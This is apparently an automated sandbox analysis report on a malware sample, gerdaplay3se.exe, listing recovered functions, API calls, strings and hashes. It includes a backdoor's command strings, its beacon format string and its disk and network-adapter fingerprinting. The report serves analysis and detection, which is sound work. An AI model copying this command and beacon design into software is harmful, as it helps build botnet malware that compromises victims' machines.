Function 00452EFC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetFileAttributesA.KERNEL32(00000000,?,00000000,00452F5D,?,?,-00000001,?), ref: 00452F37
GetLastError.KERNEL32(00000000,?,00000000,00452F5D,?,?,-00000001,?), ref: 00452F3F

Strings

8)H, xrefs: 00452F6D

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: 8)H
API String ID: 1799206407-3916970867
Opcode ID: ce74d8d9d820f7af3c63aa287241caff3d4e0ddf2f4ddb2ef23d86c57fabe815
Instruction ID: dde47f3407bff09e6a38a0e499abe30f06c7602c99efaa7623f496abef129164
Opcode Fuzzy Hash: ce74d8d9d820f7af3c63aa287241caff3d4e0ddf2f4ddb2ef23d86c57fabe815
Instruction Fuzzy Hash: DAF0F972A04204BBCB00DB76AD4149EF7FCDB4A721710457BFC04D3342E6B85E089598

Function 00497F3C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0045568C: GetCurrentProcess.KERNEL32(00000028), ref: 0045569B
Part of subcall function 0045568C: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004556A1

SetForegroundWindow.USER32(?), ref: 00497F6E

Strings

Restarting Windows., xrefs: 00497F4B
Not restarting Windows because Uninstall is being run from the debugger., xrefs: 00497F99

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Process$CurrentForegroundOpenTokenWindow
String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
API String ID: 3179053593-4147564754
Opcode ID: a5cc7a903ad3542029bb0d77cfbe7a364602ca208a9d9cbdfb1bf1aa9e376992
Instruction ID: 4b66e7a5e74ecb784a5d921af265fbc31bf072fcbe68812fd41d72e60711739e
Opcode Fuzzy Hash: a5cc7a903ad3542029bb0d77cfbe7a364602ca208a9d9cbdfb1bf1aa9e376992
Instruction Fuzzy Hash: 1C0188706182409BEB05E765E441B9D3FD99F95309F50807BF404772D3C67D9D49872D

Function 0045297C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,00000000,004529D9,?,-00000001,?), ref: 004529B3
GetLastError.KERNEL32(00000000,00000000,004529D9,?,-00000001,?), ref: 004529BB

Strings

8)H, xrefs: 004529E9

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID: 8)H
API String ID: 2018770650-3916970867
Opcode ID: 2bffeee8909a74cd18c2d876bd05f5b8a9f89f7c78f30e1aeb97f13d0a4fc114
Instruction ID: 616889b774c7d0a889357a9a25b6211c9f917d25ccf9d7241b8d0611c73475d1
Opcode Fuzzy Hash: 2bffeee8909a74cd18c2d876bd05f5b8a9f89f7c78f30e1aeb97f13d0a4fc114
Instruction Fuzzy Hash: 6CF0C8B1B04708ABDB00EF759D4249EB7ECDB4A315B5045B7FC04E3742E6785E148598

Function 00452E84 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

RemoveDirectoryA.KERNEL32(00000000,00000000,00452EE1,?,-00000001,00000000), ref: 00452EBB
GetLastError.KERNEL32(00000000,00000000,00452EE1,?,-00000001,00000000), ref: 00452EC3

Strings

8)H, xrefs: 00452EF1

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID: 8)H
API String ID: 377330604-3916970867
Opcode ID: 13593e553e6be281e96d7bb953d56a5927f6c498d227b46fc847c2a148732c0c
Instruction ID: c7bdba2715fb66454707c14724f72c320a39a9c6e4158119f2851cf94b52ae50
Opcode Fuzzy Hash: 13593e553e6be281e96d7bb953d56a5927f6c498d227b46fc847c2a148732c0c
Instruction Fuzzy Hash: F2F0C871A04708ABCB00DFB59D4249EB7E8EB4E31575049B7FC04E7642E7785E049558

Function 004986DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0047D550: FreeLibrary.KERNEL32(74A90000,00481F13), ref: 0047D566

Part of subcall function 0047D220: GetTickCount.KERNEL32 ref: 0047D26A

Part of subcall function 0045733C: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 0045735B

GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00499033), ref: 00498731
TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00499033), ref: 00498737

Strings

Detected restart. Removing temporary directory., xrefs: 004986EB

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
String ID: Detected restart. Removing temporary directory.
API String ID: 1717587489-3199836293
Opcode ID: dacc005acb48f2c9a6c17312f31363653640754999933287209c5bc8a26dcf54
Instruction ID: 1f2dec6c19a68f67b40637f6c2d8dd05bc5c387ef6d5d21522d9e9d16f9083c3
Opcode Fuzzy Hash: dacc005acb48f2c9a6c17312f31363653640754999933287209c5bc8a26dcf54
Instruction Fuzzy Hash: 91E0A0716086402ADA0277AA7C1296B3B5CDB46768B6144BFF80491A52E92C4811C67D

Function 0045571C Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(?), ref: 0045573B
Sleep.KERNEL32(?), ref: 0045574B
GetLastError.KERNEL32 ref: 0045575E
GetLastError.KERNEL32 ref: 00455768

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: 648dda9fcfa3be0796cf1e21ca424cd02d6c478e8aba2200b071bc3282ec43fd
Instruction ID: c9025c94a886fb5f76285139ad04fc7cdabfdd445e85fa9ce07bcd72d8186167
Opcode Fuzzy Hash: 648dda9fcfa3be0796cf1e21ca424cd02d6c478e8aba2200b071bc3282ec43fd
Instruction Fuzzy Hash: 0FF0B472B00914E74F20A5AAA99197F678CEA9D376F10852BFC04D7307C53DDD098AED

Analysis Process: gerdaplay3se.exePID: 4052, Parent PID: 6312COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	83.5%
Signature Coverage:	4%
Total number of Nodes:	2000
Total number of Limit Nodes:	32

Executed Functions

Function 02D672AB Relevance: 96.9, APIs: 41, Strings: 14, Instructions: 659
networksleepfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(0000EA60), ref: 02D66708
RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D66713
RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D66724
_memset.LIBCMT ref: 02D66779
_memset.LIBCMT ref: 02D66788
InternetOpenA.WININET(?), ref: 02D672B5
InternetSetOptionA.WININET(00000000,00000002,?), ref: 02D672DD
InternetSetOptionA.WININET(00000000,00000005,00001388,00000004), ref: 02D672F5
InternetSetOptionA.WININET(00000000,00000006,00001388,00000004), ref: 02D6730D
_memset.LIBCMT ref: 02D6731D
InternetOpenUrlA.WININET(00000000,?,?,000000FF,04000200), ref: 02D67336
InternetReadFile.WININET(00000000,?,00001000,?), ref: 02D67358
InternetCloseHandle.WININET(00000000), ref: 02D67378
InternetCloseHandle.WININET(00000000), ref: 02D67383
_memset.LIBCMT ref: 02D673CB
RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D673EE
RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D673FF
_malloc.LIBCMT ref: 02D67498
RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D674AA
RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D674B6
_memset.LIBCMT ref: 02D674D0
_memset.LIBCMT ref: 02D674DF
_memset.LIBCMT ref: 02D674EF
_memset.LIBCMT ref: 02D67502
_memset.LIBCMT ref: 02D67518
_malloc.LIBCMT ref: 02D6758E
_memset.LIBCMT ref: 02D6759F
_strtok.LIBCMT ref: 02D675BF
_swscanf.LIBCMT ref: 02D675D6
_strtok.LIBCMT ref: 02D675ED
_free.LIBCMT ref: 02D675F9
Sleep.KERNEL32(000007D0), ref: 02D676F1
_memset.LIBCMT ref: 02D67765
RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D67772
RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D67784
_sprintf.LIBCMT ref: 02D67822
RtlEnterCriticalSection.NTDLL(00000020), ref: 02D678E6
RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D6791A

Strings

idle, xrefs: 02D6742D, 02D6779D
connect, xrefs: 02D67405, 02D67470
, xrefs: 02D67A94
updips, xrefs: 02D67441, 02D677D0
urls, xrefs: 02D67B36
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02D66739
Pz, xrefs: 02D67887
auth_swith, xrefs: 02D67537
<htm, xrefs: 02D67391
block, xrefs: 02D675A7
%d;, xrefs: 02D6781C
auth_ip, xrefs: 02D67563, 02D677F4
updurls, xrefs: 02D67455, 02D67B00
disconnect, xrefs: 02D67419, 02D67742

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: _memset$CriticalSection$Internet$EnterLeave$Option$CloseHandleOpenSleep_malloc_strtok$FileRead_free_sprintf_swscanf
String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$Pz$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls$urls
API String ID: 696907137-793996860
Opcode ID: 96472d61c4ca3d4455a0e44bad87cc92fce96d7e18f51458b65c13bd403504ec
Instruction ID: 1b46206e6cd75c6ead9bdde101451502ea212d8217309bbfaeef93b045dc03a9
Opcode Fuzzy Hash: 96472d61c4ca3d4455a0e44bad87cc92fce96d7e18f51458b65c13bd403504ec
Instruction Fuzzy Hash: 7B32EE31548381AFE724AB24DC08BBBBBE6EF95314F10481DF58997391EB759C04CBA2

Function 02D6648B Relevance: 82.5, APIs: 42, Strings: 5, Instructions: 228
memorysleeplibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlInitializeCriticalSection.NTDLL(02D971B8), ref: 02D664BA
GetModuleHandleA.KERNEL32(ntdll.dll,sprintf), ref: 02D664D1
GetProcAddress.KERNEL32(00000000), ref: 02D664DA
GetModuleHandleA.KERNEL32(ntdll.dll,strcat), ref: 02D664E9
GetProcAddress.KERNEL32(00000000), ref: 02D664EC
GetTickCount.KERNEL32 ref: 02D664F8

Part of subcall function 02D6605A: _malloc.LIBCMT ref: 02D66068

GetVersionExA.KERNEL32(02D97010), ref: 02D66525
_memset.LIBCMT ref: 02D66544
_malloc.LIBCMT ref: 02D66551

Part of subcall function 02D72EEC: __FF_MSGBANNER.LIBCMT ref: 02D72F03
Part of subcall function 02D72EEC: __NMSG_WRITE.LIBCMT ref: 02D72F0A
Part of subcall function 02D72EEC: RtlAllocateHeap.NTDLL(00790000,00000000,00000001), ref: 02D72F2F

_malloc.LIBCMT ref: 02D66561
_malloc.LIBCMT ref: 02D6656C
_malloc.LIBCMT ref: 02D66577
_malloc.LIBCMT ref: 02D66582
_malloc.LIBCMT ref: 02D6658D
_malloc.LIBCMT ref: 02D66598
_malloc.LIBCMT ref: 02D665A7
GetProcessHeap.KERNEL32(00000000,00000004), ref: 02D665BE
RtlAllocateHeap.NTDLL(00000000), ref: 02D665C7
GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D665D6
RtlAllocateHeap.NTDLL(00000000), ref: 02D665D9
GetProcessHeap.KERNEL32(00000000,00000400), ref: 02D665E4
RtlAllocateHeap.NTDLL(00000000), ref: 02D665E7
_memset.LIBCMT ref: 02D665FA
_memset.LIBCMT ref: 02D66606
_memset.LIBCMT ref: 02D66613
RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D66621
RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D6662E
_malloc.LIBCMT ref: 02D66652
_malloc.LIBCMT ref: 02D66660
_malloc.LIBCMT ref: 02D66667
_malloc.LIBCMT ref: 02D6668D
QueryPerformanceCounter.KERNEL32(00000200), ref: 02D666A0
Sleep.KERNELBASE ref: 02D666AE
_malloc.LIBCMT ref: 02D666BA
_malloc.LIBCMT ref: 02D666C7
_memset.LIBCMT ref: 02D666DC
_memset.LIBCMT ref: 02D666EC
Sleep.KERNELBASE(0000EA60), ref: 02D66708
RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D66713
RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D66724
_memset.LIBCMT ref: 02D66779
_memset.LIBCMT ref: 02D66788

Strings

strcat, xrefs: 02D664DC
sprintf, xrefs: 02D664CB
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02D66739
ntdll.dll, xrefs: 02D664C6, 02D664D0, 02D664E1
cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d, xrefs: 02D6666F

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: _malloc$_memset$Heap$CriticalSection$Allocate$Process$AddressEnterHandleLeaveModuleProcSleep$CountCounterInitializePerformanceQueryTickVersion
String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
API String ID: 2251652938-2678694477
Opcode ID: c35143b2fa8c555d0659105cbde004407fec1e7b78de1bb58bab98b9f73105f4
Instruction ID: 9468d3d0aef4ee668e3d9b6a323c7ee8c8eec08eacf0f447ad973c82e39aea57
Opcode Fuzzy Hash: c35143b2fa8c555d0659105cbde004407fec1e7b78de1bb58bab98b9f73105f4
Instruction Fuzzy Hash: C57142B1D583509BF310AB749C49B6BBBE9EF45714F20081DF99597380EA789C40CFA6

Function 00401B4B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B

Strings

iphlpapi.dll, xrefs: 00401B58
o, xrefs: 00401BF2
GetAdaptersInfo, xrefs: 00401B6E

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: Library$AdaptersAddressFreeInfoLoadProc
String ID: GetAdaptersInfo$iphlpapi.dll$o
API String ID: 514930453-3667123677
Opcode ID: 4786119c2dd8152e4b47b2a924d6ecb004799f19bdb0843ab8028876a5fcac46
Instruction ID: 9300e3b8f0653b0f10764aaa79a1f2494f67c894d04353eb45b18fdb2f867aae
Opcode Fuzzy Hash: 4786119c2dd8152e4b47b2a924d6ecb004799f19bdb0843ab8028876a5fcac46
Instruction Fuzzy Hash: 9621B870944109AFEF11DF65C944BEF7BB8EF41344F1440BAE504B22E1E778A985CB69

Function 02D6F8DE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(iphlpapi.dll), ref: 02D6F8F4
GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 02D6F90D
GetAdaptersInfo.IPHLPAPI(?,?), ref: 02D6F932
FreeLibrary.KERNEL32(00000000), ref: 02D6F9BB

Strings

GetAdaptersInfo, xrefs: 02D6F907
iphlpapi.dll, xrefs: 02D6F8E8

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: Library$AdaptersAddressFreeInfoLoadProc
String ID: GetAdaptersInfo$iphlpapi.dll
API String ID: 514930453-3114217049
Opcode ID: 674141bc7bd3c9628577747ccab938c777c85fb0413cbdfd64e42b068edae957
Instruction ID: 076f8db08d4ab9c2e01554bcdf46ca0a1437f39406add11a08ff27f9328eaea1
Opcode Fuzzy Hash: 674141bc7bd3c9628577747ccab938c777c85fb0413cbdfd64e42b068edae957
Instruction Fuzzy Hash: D521A275A0460AAFDB10DBA8E888BFEBBB9EF05310F1440AAD546E7741D7308D45CBA0

Function 02D6F7DA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 02D6F7F9
DeviceIoControl.KERNELBASE(00000000,002D1400,?,0000000C,?,00000400,?,00000000), ref: 02D6F837
GetLastError.KERNEL32 ref: 02D6F898
CloseHandle.KERNELBASE(?), ref: 02D6F8CF

Strings

\\.\PhysicalDrive0, xrefs: 02D6F7F2

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CloseControlCreateDeviceErrorFileHandleLast
String ID: \\.\PhysicalDrive0
API String ID: 4026078076-1180397377
Opcode ID: 3cb28d4238135f4dc3e35ccab607718407d28793018ab9e842ffa1a25ba45b88
Instruction ID: 4fc47650e4b3ec9450e60da938ca4b137402b7286b13fb29352b23741be5ef48
Opcode Fuzzy Hash: 3cb28d4238135f4dc3e35ccab607718407d28793018ab9e842ffa1a25ba45b88
Instruction Fuzzy Hash: 303170B1D00619AFDB24DF94E848BBEBBB9EF05754F3041AAE516A7780D7705E04CB90

Function 00401A4F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
GetLastError.KERNEL32 ref: 00401B0E
CloseHandle.KERNELBASE(?), ref: 00401B3D

Strings

\\.\PhysicalDrive0, xrefs: 00401A63

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: CloseControlCreateDeviceErrorFileHandleLast
String ID: \\.\PhysicalDrive0
API String ID: 4026078076-1180397377
Opcode ID: a2e68a95d94bbc6a40bee8a11280b17da373fae52957672b226b91710cefcd17
Instruction ID: c07866d4b4e887281577b2397114bebd63d98cfae9bba907e2345ee80fd6f57b
Opcode Fuzzy Hash: a2e68a95d94bbc6a40bee8a11280b17da373fae52957672b226b91710cefcd17
Instruction Fuzzy Hash: 00316D71D01118EACB21EFA5CD849EFBBB9FF41750F20417AE515B22A0E3786E45CB98

Function 02D663D2 Relevance: 82.5, APIs: 42, Strings: 5, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

strcat, xrefs: 02D664DC
sprintf, xrefs: 02D664CB
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02D66739
ntdll.dll, xrefs: 02D664C6, 02D664D0, 02D664E1
cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d, xrefs: 02D6666F

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID:
String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$cid=%.8x&connected=%d&sport=%d&high_port=%x&low_port=%x&stream=%d&os=%d.%d.%04d&dgt=%d&dti=%d$ntdll.dll$sprintf$strcat
API String ID: 0-2678694477
Opcode ID: 5928accc84f785bf01999c4586186666cee50f8d93527682fbef95c978ee1ea5
Instruction ID: 4e16cfb8d9a0f4c0e48417adf02e780fd463a70bd46d94753ed8be28c306d645
Opcode Fuzzy Hash: 5928accc84f785bf01999c4586186666cee50f8d93527682fbef95c978ee1ea5
Instruction Fuzzy Hash: B081A6B1D583509BE310AB75AC48B6BBBE9EF85710F20082EF944D7350EA789C00CFA5

Function 02D61CF8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 105
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D61D11
GetLastError.KERNEL32 ref: 02D61D23

Part of subcall function 02D61712: __EH_prolog.LIBCMT ref: 02D61717

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D61D59
GetLastError.KERNEL32 ref: 02D61D6B
__beginthreadex.LIBCMT ref: 02D61DB1
GetLastError.KERNEL32 ref: 02D61DC6
CloseHandle.KERNEL32(00000000), ref: 02D61DDD
CloseHandle.KERNEL32(00000000), ref: 02D61DEC
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D61E14
CloseHandle.KERNELBASE(00000000), ref: 02D61E1B

Strings

thread, xrefs: 02D61DFB
thread.entry_event, xrefs: 02D61D3C
thread.exit_event, xrefs: 02D61D84

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
String ID: thread$thread.entry_event$thread.exit_event
API String ID: 831262434-3017686385
Opcode ID: 7d611788d36251dfa93263865c4f5b02e36132563dd0611262601487670f18c9
Instruction ID: eedf73a8b9abc2714b2dfe35daa94961f3d15ea801ddeb3b131ad08b923c56c6
Opcode Fuzzy Hash: 7d611788d36251dfa93263865c4f5b02e36132563dd0611262601487670f18c9
Instruction Fuzzy Hash: C6317C759143019FE700EF20C889B2BBBA5FB84755F204969F9599B390EB70DC49CFA2

Function 02D64D86 Relevance: 16.8, APIs: 11, Instructions: 256
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 02D64D8B
RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D64DB7
RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D64DC3

Part of subcall function 02D64BED: __EH_prolog.LIBCMT ref: 02D64BF2
Part of subcall function 02D64BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02D64CF2

RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D64E93
RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D64E99
RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D64EA0
RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D64EA6
RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D650A7
RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D650AD
RtlEnterCriticalSection.NTDLL(02D971B8), ref: 02D650B8
RtlLeaveCriticalSection.NTDLL(02D971B8), ref: 02D650C1

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
String ID:
API String ID: 2062355503-0
Opcode ID: f9b8831027b497c6ad25647dc73b3aad803e6e7fd3ccd014bac8b4a78c4ca834
Instruction ID: a2d3af3dce273bee807d6faf79f8ef58e320c1721971d2740ad980f7908cf80a
Opcode Fuzzy Hash: f9b8831027b497c6ad25647dc73b3aad803e6e7fd3ccd014bac8b4a78c4ca834
Instruction Fuzzy Hash: 94B13671D002599FEF21DFA0D848BEEBBB5AF04314F20409AE445BA381DB755E89CFA1

Function 00401F64 Relevance: 12.1, APIs: 8, Instructions: 121
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
GetLastError.KERNEL32 ref: 00401F86
SizeofResource.KERNEL32(00000000), ref: 00401F93
LoadResource.KERNEL32(00000000), ref: 00401FAD
LockResource.KERNEL32(00000000), ref: 00401FB4
